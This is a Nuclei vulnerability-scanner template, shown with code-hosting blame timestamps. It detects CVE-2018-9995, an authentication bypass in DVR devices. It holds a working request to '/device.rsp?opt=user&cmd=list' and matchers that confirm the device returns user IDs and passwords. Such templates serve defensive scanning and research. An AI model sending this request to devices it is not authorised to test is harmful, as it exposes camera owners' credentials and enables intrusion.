nuclei-templates/cves/2018/CVE-2018-9995.yaml

28 lines
545 B
YAML
Raw Normal View History

2021-04-07 12:33:31 +00:00
id: CVE-2018-9995
info:
name: DVR Authentication Bypass
author: princechaddha
severity: high
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-9995
tags: cve,cve2018,auth-bypass
requests:
- method: GET
path:
- "{{BaseURL}}/device.rsp?opt=user&cmd=list"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "\"uid\":"
2021-06-23 21:02:23 +00:00
- "\"pwd\":"
- "\"view\":"
2021-04-07 12:33:31 +00:00
- "playback"
condition: and
part: body